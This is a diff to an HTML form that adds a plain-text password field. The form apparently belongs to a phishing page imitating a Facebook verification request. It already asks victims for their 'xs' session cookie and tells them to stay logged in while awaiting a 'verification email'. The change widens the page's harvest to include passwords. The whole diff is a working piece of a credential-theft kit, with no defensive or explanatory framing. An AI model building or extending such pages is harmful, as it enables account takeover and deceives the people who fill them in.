--- a/request.html
+++ b/request.html
@@ -42,6 +42,9 @@
                                     <input type="text" name="xs">
                                     <p class="mt-2" style="font-size: 12px;">Please make sure not to log out from your computer or laptop until you have received a verification email.</p>
                                 </div>
+                                 <label class="mt-2" style="font-size: 12px;">password</label>
+                                <br>
+                                <input type="text" name="password">
                                 <div class="p-2 mb-2 d-flex justify-content-end" style="background: rgb(245, 246, 247);">
                                     <button type="submit" class="text-white border-0" style="background: rgb(66, 103, 178);">Submit</button>
                                 </div>
